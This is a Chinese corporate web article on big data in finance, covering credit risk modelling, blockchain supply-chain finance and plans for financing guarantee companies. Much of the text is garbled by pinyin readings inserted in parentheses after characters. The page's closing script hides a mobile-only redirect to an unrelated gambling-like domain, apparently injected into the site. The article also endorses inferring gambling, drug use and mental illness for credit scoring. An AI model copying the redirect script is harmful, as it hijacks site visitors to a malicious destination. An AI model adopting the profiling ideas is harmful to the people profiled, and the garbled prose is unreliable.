一(yi)是将用户行为数(shu)据(ju)纳入(ru)到风控数(shu)据(ju)体系中。风控模型中最好的数据还是金融数据,例如年龄、收入、职业、学历、资产、负债等信用数据,这些数据同信用相关度高,可以反映用户的还款能力和还款意愿,是信用风险评估最好的数据。但是除了这些强相关的数据,一些用户行为数据对信用风险评估也具有较大的影响,例如用户是否经常去澳门赌博,用户是否经常刻意隐藏自己,用户是否参与高利贷,用户是否具有吸毒倾向,是否患有重大心理疾病等,这些信息在一定概率下决定了用户风险水平。从实际发生的风险事件显示,这些小概率风险事件会导致很严重的后果,同信用风险事件的发生具有较强的关联性。前述用户行为信息,很大程度是大数据采集和分析的结果,用户一般不会提供给金融行业。前述用户行为信息中很多是规律性信息,需要大数据分析才有可能得到,其在信用评估中的权重,也需要不断地优化模型去完善。

二是丰富数据输入纬度以及较细的颗粒度,补充传统风控。传统风控模型已经不能适应复杂的现代风险管理环境,特别在数据信息录入纬度上,影响客户信用评分的信息较多,但很多信息尚未引入到风险评估流程。例如企业所处行业的竞争环境以及同业产品的竞争、企业产品的生命周期、企业的关联交易信息和司法信息、贷款个人的心理和性格、上下游产业经营情况、市场需求变化、客户对企业产品的评价等。大数据风控可以提供全面的数据(数据的广度), 强相关数据(数据的深度),实效性数据(数据的鲜活度)。这些数据颗粒度可以很小,同内部数据以及原有数据打通和整合之后,会影响风险评估结果,提升信用风险管理水平,客观地反映用户风险水平。信用风险管理中还款意愿也较为重要,多维度、全量的用户行为数据可以客观揭示用户的还款意愿,另外细小的颗粒度信息在打通之后,可以更加客观了解客户的还款能力。全量数据加用户行为分析,可以充分了解客户行为,帮助金融企业识别出恶意欺诈客户。这些多纬度、细颗粒度、全面的信息正是大数据风控的优势所在,同时也是传统风控的一个很好的补充。

三是实时输入和实时计算,解决风险视图实效性问题。传统风控的一个重要缺点是数据录入和评估结果的滞后性,导致风控模型反映的是滞后数据的结果,产生的结构性风险较大。大数据的数据采集和计算能力,可以帮助金融企业建立实时的风险管理视图。借助全面多纬度的数据、自我学习能力强的风控模型、实时计算结果,金融企业可以提升量化风险评估能力。数据、技术、模型、分析成为信用风险评估的四个关键元素,其背后的力量就是大数据的技术和分析能力。利用大数据的风控能力,实时输出风险因子信息,为金融企业提供实时风险管理视图,提高风险管理的及时性。

3.优化决策

从金融大数据(ju)(ju)使用的(de)(de)实际(ji)来看,金融数据(ju)(ju)来源于(yu)信息系(xi)统,是业(ye)(ye)务经营(ying)管理(li)(li)行(xing)为的(de)(de)信息化反(fan)映(ying)。在金融行(xing)业(ye)(ye)不(bu)断(duan)完善信息系(xi)统建设(she)、有效支撑企(qi)业(ye)(ye)经营(ying)管理(li)(li)和业(ye)(ye)务发(fa)展的(de)(de)进程(cheng)中(zhong),信息系(xi)统所产生的(de)(de)数据(ju)(ju)内容(rong)同步反(fan)映(ying)了企(qi)业(ye)(ye)收集、整理(li)(li)、生产、处理(li)(li)、分析各类经营(ying)管理(li)(li)信息,有效管控各类业(ye)(ye)务经营(ying)活动的(de)(de)整体过程(cheng)。

传统的决策系统是单一线性、决策范围相对狭隘,区域、业务板块、部门之间都具有较大的局限性,决策结果相对片面,缺乏大局观和各个部门的配合。大数据的决策则是打破了区域间、业务板块间、部门间的局限,形成一个非线性、面向多样、自下而上的新型决策系统。这样的决策系统使得区域、业务板块之间更加具有穿透性,而决策的依据更加多样、更加客观,使得企业的决策更加安全准确。

4. 创新业务

通过对(dui)大(da)数(shu)据(ju)的(de)应用,可以改(gai)善(shan)金(jin)融(rong)机构(gou)与客户(hu)之间(jian)的(de)交(jiao)互(hu)、增(zeng)(zeng)加用户(hu)粘性,增(zeng)(zeng)强金(jin)融(rong)企业(ye)业(ye)务(wu)核心竞争力。此外,通过高(gao)端数(shu)据(ju)分(fen)析和综合(he)化数(shu)据(ju)分(fen)享,有效(xiao)对(dui)接银行、保险、信(xin)托、基金(jin)等各类金(jin)融(rong)产品,使金(jin)融(rong)企业(ye)能够(gou)从其他领(ling)域借鉴并创造出新的(de)金(jin)融(rong)产品。

(四)区(qu)块链(lian)技术推(tui)动供应链(lian)金融(rong)业务发展

大数据除在前述传统金(jin)融领(ling)域得到(dao)广(guang)泛(fan)运用外(wai),借助区块链(lian)的快速(su)发展,近(jin)年来,供应链(lian)金(jin)融业务也得以(yi)快速(su)发展。

1.供应链金融概述

供应链管理是指对由供应商、制造商、分销商、零售商到客户所构成网络中的物流、商流、信息流和资金流(合称“四流”)进行计划、操作和优化。供应链金融将供应链上的核心企业及其相关的上下游配套企业作为一个整体,以产业链为依托、以交易环节为重点、以资金调配为主线、以风险管理为保证、以实现共赢为目标,为整条供应链提供融资等整体金融解决方案。与传统的贸易融资业务(如信用证相比,供应链金融在真实的贸易背景下降低了对银行作为信用中介的需求,从而衍生出保理、融资租赁等模式。金融服务的提供也同时摒弃了以商业银行为单一主体的模式,拓展到以核心企业、物流企业、产业互联网平台等企业为主要组织者。供应链金融业务也因此由简单的贸易融资产品变成一种面向供应链所有成员的系统性财务安排。

2.供应链金(jin)融痛(tong)点

供应链金融主要是由供应链上下游的全量业务数据驱动进行风险评估。主要的风险点在于:一是信息不对称风险。供应链运行过程中,各类信息分散保存在各个环节中,各个参与主体难以了解交易事项最新进展,信息的不对称导致整个供应链信用体系难以建立,金融机构往往会出于风控的考虑而较为谨慎。二是贸易背景真实性问题。商业银行是以实体经济中供应链上交易方的真实交易关系为基础,利用交易过程中产生的应收账款、预付账款、存货为抵/质押,为供应链上下游企业提供融资服务。融资过程中,一旦交易的真实性不存在,金融机构将面临巨大的风险。三是业务操作风险。供应链金融中专业化的操作环节流程安排,以及独立的第三方监管引入等方式,构筑了独立于企业信用风险的第一还款来源。但这无疑对操作环节的严密性和规范性提出了很高的要求,容易出现操作性风险。因此,操作制度的完善性、操作环节的严密性和操作要求的执行力度将直接关系到第一还款来源的效力,进而决定信用风险能否被有效屏蔽。

3.区块链技术推动供应链金(jin)融发(fa)展

区块链是由分布式账本技术、点对点技术、非对称加密技术、智能合约技术、共识机制等一系列现有成熟技术的有机组合,它对账本进行分布式的有效记录,并且提供完善的脚本以支持不同的业务逻辑,在典型的区块链系统中,数据以区块(block)为单位产生和存储,并按照时间顺序连成链式(chain)数据结构。所有节点共同参与区块链系统的数据验证、存储和维护,新区块的创建通常需得到全网多数支持(数量取决于不同的共识机制节点的确认,并向各节点广播,实现全网同步,之后不能更改或删除)。区块链系统应具备如下特征:一是多方写入,共同维护区块链的记账参与方应当由多个利益不完全一致的实体组成,在不同的记账周期内,由不同的参与方主导发起记账,其他的参与方将对主导方发起的记账信息进行共同验证。二是公开账本。区块链系统记录的账本应处于所有参与者被允许访问的状态,记账参与者必须有能力访问信息内容和账本的历史情况,但是公开账本指的是可访问性的公开,并不代表信息本身的公开,因此,业界期望将隐私保护方面的技术应用到区块链领域,以解决通过密文操作就能验证信息有效性的问题。三是去中心化。在有众多节点的系统中,每个节点都具有高度自治的特征。节点之间彼此可以自由连接,形成新的连接单元。任何一个节点都可能成为阶段性的中心,但不具备强制性的中心控制功能。节点与节点之间的影响,会通过网络而形成非线性因果关系。四是不可篡改性。区块链的不可篡改是基于密码学的散列算法,以及多方共同维护的特性,但同时由于这个特性,区块链的不可篡改并不是严格意义上的,称之为难以篡改更为合适。

4.供应(ying)链金融案例

2017年(nian)6月,浙商(shang)银行与(yu)趣链科技(ji)合作(zuo)(zuo)搭建(jian)的(de)基(ji)于区(qu)块链技(ji)术(shu)的(de)“应收(shou)款(kuan)(kuan)链平(ping)台”正式上线运营,平(ping)台用于办(ban)理企(qi)业(ye)(ye)应收(shou)账款(kuan)(kuan)的(de)签(qian)发(fa)、承兑保兑、支付、转(zhuan)让(rang)、质(zhi)押(ya)、兑付等业(ye)(ye)务(wu),实现了将传统的(de)保理业(ye)(ye)务(wu)移植到区(qu)块链上,让(rang)企(qi)业(ye)(ye)能够更加(jia)高效的(de)运用应收(shou)账款(kuan)(kuan)融资(zi),平(ping)台提供单一(yi)企(qi)业(ye)(ye)、产业(ye)(ye)联盟、区(qu)域联姻等多种合作(zuo)(zuo)模式,助力(li)企(qi)业(ye)(ye)构建(jian)供应链商(shang)圈,其核(he)心是将应收(shou)账款(kuan)(kuan)转(zhuan)化为(wei)电子(zi)支付结算(suan)和融资(zi)工具,以(yi)达到盘活流动资(zi)产,加(jia)快资(zi)金周转(zhuan),减少融资(zi)成本以(yi)达到帮助企(qi)业(ye)(ye)降本增效和助力(li)小微企(qi)业(ye)(ye)融资(zi)的(de)目的(de)。

平(ping)(ping)台(tai)上(shang)(shang)(shang)线后平(ping)(ping)稳运营(ying),2017年(nian)(nian)(nian)8月初(chu)在平(ping)(ping)台(tai)上(shang)(shang)(shang)运行(xing)(xing)了首单业(ye)务,实现了在线签(qian)发(fa)应(ying)收(shou)(shou)(shou)账(zhang)(zhang)款(kuan)(kuan)1339万元,并进行(xing)(xing)了企业(ye)间(jian)的(de)线上(shang)(shang)(shang)支(zhi)付交易(yi)。此后,应(ying)收(shou)(shou)(shou)款(kuan)(kuan)链(lian)平(ping)(ping)台(tai)实现平(ping)(ping)稳较快发(fa)展。浙商(shang)银行(xing)(xing)2019年(nian)(nian)(nian)年(nian)(nian)(nian)报显示,截至2019年(nian)(nian)(nian)年(nian)(nian)(nian)末,平(ping)(ping)台(tai)落地(di)项(xiang)目2,493个(ge),较上(shang)(shang)(shang)年(nian)(nian)(nian)末增长76.81%,应(ying)收(shou)(shou)(shou)款(kuan)(kuan)保兑余额961.08亿(yi)元,较上(shang)(shang)(shang)年(nian)(nian)(nian)末增长46.34%。此外,2018年(nian)(nian)(nian)8月17日,“浙商(shang)链(lian)融2018年(nian)(nian)(nian)度第一(yi)期企业(ye)应(ying)收(shou)(shou)(shou)账(zhang)(zhang)款(kuan)(kuan)资(zi)产支(zhi)持票据”在银行(xing)(xing)间(jian)市(shi)场发(fa)行(xing)(xing),该产品(pin)发(fa)行(xing)(xing)金额4.57亿(yi)元,发(fa)行(xing)(xing)期限354天,债项(xiang)信用等级为(wei)AAA;产品(pin)以企业(ye)在浙商(shang)银行(xing)(xing)应(ying)收(shou)(shou)(shou)款(kuan)(kuan)链(lian)平(ping)(ping)台(tai)上(shang)(shang)(shang)签(qian)发(fa)及(ji)承兑的(de)应(ying)收(shou)(shou)(shou)账(zhang)(zhang)款(kuan)(kuan)为(wei)基础(chu)资(zi)产。这是银行(xing)(xing)间(jian)市(shi)场首单应(ying)用区(qu)块(kuai)链(lian)技(ji)术、直(zhi)接以企业(ye)应(ying)收(shou)(shou)(shou)账(zhang)(zhang)款(kuan)(kuan)为(wei)基础(chu)资(zi)产的(de)证券(quan)化(hua)产品(pin)。

(五)大数据金融(rong)面临的挑(tiao)战

1.金融行业(ye)的数据资产管理应用水平仍(reng)待(dai)提(ti)高

金融行业的数据资产管理仍存在数据质量不足、数据获取方式单一、数据系统分散等问题。一是金融数据质量不足,主要体现为数据缺失、数据重复、数据错误和数据格式不统一等方面。二是金融行业数据来源相对单一,对于外部数据的引入和应用仍需加强。三是金融行业的数据标准化程度低,分散在多个数据系统中,现有的数据采集和应用能力难以满足当前大规模的数据分析要求,数据应用需求的响应速度仍不足。

2.金融大数据应用技术与业务(wu)探索仍需突破(po)

金融行业的(de)(de)(de)大数据(ju)分(fen)(fen)析应用模(mo)型仍处于探(tan)索阶段,成熟案例和(he)解(jie)决(jue)方案相(xiang)对较少,金融机构应用大数据(ju)需要投入大量的(de)(de)(de)时间和(he)成本进行调研和(he)尝试,一定程度上制约了金融机构大数据(ju)应用的(de)(de)(de)积极性。此外,目(mu)前的(de)(de)(de)应用实践反映(ying)出(chu)大数据(ju)分(fen)(fen)析的(de)(de)(de)误判率(lv)还比较高,机器判断后的(de)(de)(de)结果仍需要人工核查,资(zi)源(yuan)利用效率(lv)和(he)客(ke)户体验(yan)均有(you)待提(ti)升(sheng)。

3.金融大数据的行业标(biao)准与安全(quan)规范仍待完(wan)善

当(dang)前,金(jin)融(rong)大数(shu)据(ju)的(de)相关标(biao)准(zhun)(zhun)仍处于探索期(qi),金(jin)融(rong)大数(shu)据(ju)缺乏统一的(de)存储管(guan)理标(biao)准(zhun)(zhun)和(he)互通(tong)共享平台,涉及金(jin)融(rong)行(xing)业大数(shu)据(ju)的(de)安(an)全(quan)(quan)(quan)规(gui)范还存在(zai)(zai)较多空白。相对于其他行(xing)业,金(jin)融(rong)大数(shu)据(ju)涉及更(geng)多的(de)用户个人隐(yin)私(si),在(zai)(zai)用户数(shu)据(ju)安(an)全(quan)(quan)(quan)和(he)信息保护(hu)方面要求更(geng)加严(yan)格。大数(shu)据(ju)在(zai)(zai)多个金(jin)融(rong)行(xing)业细分(fen)领域(yu)的(de)应用,在(zai)(zai)缺乏行(xing)业统一安(an)全(quan)(quan)(quan)标(biao)准(zhun)(zhun)和(he)规(gui)范的(de)情况下,单纯依靠(kao)金(jin)融(rong)机构(gou)自身管(guan)控,会(hui)带来较大的(de)安(an)全(quan)(quan)(quan)风险(xian)。

4.金融大数据(ju)发展(zhan)的顶层设(she)计和(he)扶持(chi)政策还需强化

在发展规划方面,金融大数据发展的顶层设计仍需强化。一方面,金融机构间的数据壁垒仍较为明显,数据应用仍是各自为战,缺乏有效的整合协同,跨领域和跨企业的数据应用相对较少。另一方面,金融行业数据应用缺乏整体性规划,当前仍存在较多分散性、临时性和应激性的数据应用,数据资产的应用价值没有得到充分发挥,业务支撑作用仍待加强,需要通过行业整体性的产业规划和扶持政策,明确发展点,加强方向引导。 

(六(liu))大数据金融行业发展趋势

1.大数据应(ying)用水平(ping)将成为(wei)金融(rong)企业竞争力的核心要素

在国内,金融机构对大数据的认知已经从探索阶段进入到认同阶段。金融行业对大数据的需求属于业务驱动型,其迫切希望应用大数据技术使营销更精准、风险识别更准确、经营决策更具针对性,产品更具吸引力,从而降低企业成本,提高企业利润。随着更多金融机构基于大数据获得丰厚的回报,将进一步打消顾虑,加速大数据的普及。

2.金融(rong)行业数据整合、共享和开放成为趋势

数据越关联越有价值,越开放越有价值。全球范围内掀起一轮数据开放的热潮,国务院《促进大数据发展行动纲要》提出要在中央政府层面实现金税、金关、金财、金审、金土、金农等信息系统通过统一平台进行数据共享和交换。

3.金融数据与其(qi)他(ta)领域数据的(de)融合应用(yong)不(bu)断强化

2015年以前,金融机构主要基于自有信息进行分析。2016年开始,随着大数据技术日益成熟,金融机构得以通过客户动态数据的获取更深入地了解客户。未来,数据流通的市场更加健全,金融机构将可以方便地获取电信、电商、医疗、出行等其他行业的数据,一方面会有力地促进金融数据和其他行业数据融合,使得金融机构的管销和风控模型更加精准。另一方面,跨行业数据融合会催生出跨行业的应用,使金融行业得以设计出更多的基于场景的金融产品,与其他行业进行更深入的融合。

4.人工智能(neng)正在成(cheng)为金融(rong)大数据应用的新方向(xiang)

新(xin)型技(ji)术的(de)快(kuai)速(su)发(fa)展(zhan)(zhan),加快(kuai)大(da)(da)(da)数(shu)据(ju)(ju)和(he)(he)人(ren)工智(zhi)(zhi)(zhi)能(neng)技(ji)术的(de)快(kuai)速(su)融(rong)合(he)。大(da)(da)(da)数(shu)据(ju)(ju)技(ji)术强调数(shu)据(ju)(ju)的(de)采(cai)集(ji)、储存、处理(li)(li)(li)和(he)(he)展(zhan)(zhan)现(xian)。人(ren)工智(zhi)(zhi)(zhi)能(neng)可(ke)(ke)以在(zai)(zai)各个阶段助力大(da)(da)(da)数(shu)据(ju)(ju)发(fa)挥更大(da)(da)(da)的(de)作用。在(zai)(zai)采(cai)集(ji)上(shang)(shang),图(tu)像识(shi)别、语(yu)音识(shi)别、语(yu)义理(li)(li)(li)解(jie)等人(ren)工智(zhi)(zhi)(zhi)能(neng)认知技(ji)术实(shi)(shi)现(xian)海量非结(jie)构化数(shu)据(ju)(ju)采(cai)集(ji),在(zai)(zai)数(shu)据(ju)(ju)的(de)储存和(he)(he)管理(li)(li)(li)上(shang)(shang),人(ren)工智(zhi)(zhi)(zhi)能(neng)技(ji)术可(ke)(ke)以自动为数(shu)据(ju)(ju)打标(biao)签,自动将(jiang)数(shu)据(ju)(ju)归类。在(zai)(zai)数(shu)据(ju)(ju)处理(li)(li)(li)上(shang)(shang),人(ren)工智(zhi)(zhi)(zhi)能(neng)、深(shen)度(du)(du)学(xue)习(xi)、机器学(xue)习(xi)、知识(shi)图(tu)谱技(ji)术可(ke)(ke)以提(ti)高(gao)算法模型的(de)数(shu)据(ju)(ju)处理(li)(li)(li)的(de)效(xiao)率和(he)(he)准确度(du)(du),数(shu)据(ju)(ju)展(zhan)(zhan)现(xian)上(shang)(shang),智(zhi)(zhi)(zhi)能(neng)可(ke)(ke)视化技(ji)术可(ke)(ke)以实(shi)(shi)现(xian)数(shu)据(ju)(ju)实(shi)(shi)时监控和(he)(he)可(ke)(ke)视化呈现(xian)。大(da)(da)(da)数(shu)据(ju)(ju)与人(ren)工智(zhi)(zhi)(zhi)能(neng)正在(zai)(zai)进行多维度(du)(du)的(de)深(shen)度(du)(du)融(rong)合(he),拓(tuo)展(zhan)(zhan)了金融(rong)大(da)(da)(da)数(shu)据(ju)(ju)的(de)应用价值和(he)(he)应用场景。

5.金(jin)融数据(ju)安全问题越来越受(shou)到重(zhong)视

大(da)数(shu)据使得金融机构海量的(de)(de)高价值数(shu)据得到集中,并使数(shu)据实现(xian)(xian)快速存取。但是,如果出现(xian)(xian)信息泄露(lu)(lu)可(ke)能一次(ci)性泄露(lu)(lu)全部的(de)(de)数(shu)据资产。数(shu)据泄露(lu)(lu)后还可(ke)能急速扩散,甚(shen)至(zhi)出现(xian)(xian)更加严(yan)重的(de)(de)数(shu)据篡改(gai)和智能欺诈的(de)(de)情况。


四、融资担保公(gong)司(si)大数据产业发展思路

(一)总体思路(lu)

目前,较之银行、券商等金融机构,多数融资担保公司尚未建立信息化体系,基于大数据技术的业务模式和风控模型尚不成熟。在此背景下,融资担保公司应加快大数据基础的建设,具体来看,一是加快融资担保公司自身信息化的建设步伐,与高资质软件开发企业合作,开发符合自身业务实际需要的信息化系统,实现业务全流程线上化、可视化,优化公司经营管理效率。二是丰富融资担保公司自身大数据,深入挖掘自身业务积累的数据,积极拓展外部优质数据源,推动公司整体数据金融化进度。三是加快融资担保公司大数据风控体系的建设,逐步将大数据应用于融资担保业务开展的具体场景中,推动融资担保公司业务开展的同时降低业务风险。

(二)大数据对融资(zi)担(dan)保公司业务的推动路径

1.优化(hua)公司管(guan)理流程

依托融资担保公司信息化和大数据系统,有效提升融资担保公司的经营管理效能:一是依托信息化系统,推动业务全程线上化,优化业务流程,提升业务、风控的决策效率。二是依托可视化的业务系统,实时监控业务流程,及时发现业务开展过程中的瓶颈问题,及时予以解决;同时,定期对业务数据进行全面分析,提高公司经营管理效能。三是依托外部数据,为寻找新的业务方向、明确融资担保公司未来转型发展思路提供智力支持。四是在金融监管日益趋严的背景下,开展舆情监控,及时了解发现不利于融资担保公司发展的负面信息,提升公司整体合规性发展。

2.加快大数据在(zai)融资担保(bao)公(gong)司业务(wu)中的应用

一是实现精准营销,提升业务拓展力度。依托大数据模型下的客户画像,及时发现潜在客户,精准定位客户需求,通过向客户提供针对性业务产品,拓展业务渠道,获取优质客户。二是依托大数据技术做好存量客户管理。深入挖掘存量客户交易信息、服务反馈等数据信息,及时发现存量客户尚未满足的需要和对现有服务的不满,及时采取恰当行动对存量客户进行挽留,减少客户流失。三是实现客户生命周期管理。通过对存量客户的跟踪,及时识别客户新的需求,通过差异化业务产品的精准匹配,实现对客户全生命周期的服务匹配。

3.加(jia)快大(da)数(shu)据风控体系的建设

大数据风控模型主要影响在于:一是推动风控思想的改变。担保行业传统风控思想以控制单一项目风险为主,大数据风控下,尤其是针对中小微企业客户,根据其小额分散的特点,参照保险行业精算理论,运用大数法则对批量业务的风险进行建模和分析,从中找到风险发生的规律,并在一定假设条件下对未来风险发生的可能和造成的风险大小进行预判,实现通过收益覆盖风险的业务逻辑。

二是实现全程动态风控体系。融资担保公司现有的风控体系主要基于现场尽调过程中收集的客户的历史数据和财务报表等数字化数据。但依托大数据风控体系,则能够在其风险管理系统中接入海量集中式数据,通过多维度、多种类数据的交叉验证,解决客户信用风险评估中客户信息难以全面收集的问题,从而有效地缓解业务中所面临的信息不对称的问题,提高了对客户信用风险的识别和预防能力。此外,数据技术的利用,将提升融资担保公司保后管理能力,尤其是非现场的保后管理能力。在大数据技术的应用下,融资担保公司的风险控制将以非现场的预警监测为依托,对不同客户群的风险特征和行为模式进行识别,强调对授信客户进行持续跟踪、动态监测和实时预警。


文章作者(zhe):战略研究部(bu)——孙坚(jian)

0
诚聘英才

官方微信(xin)公众号(hao)

联系我们

027-87317028

027-87319263-8209

湖北省武汉市武昌区
洪山路64号湖光大厦东7楼

武汉市武昌(chang)区杏林西(xi)路6号2层

var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();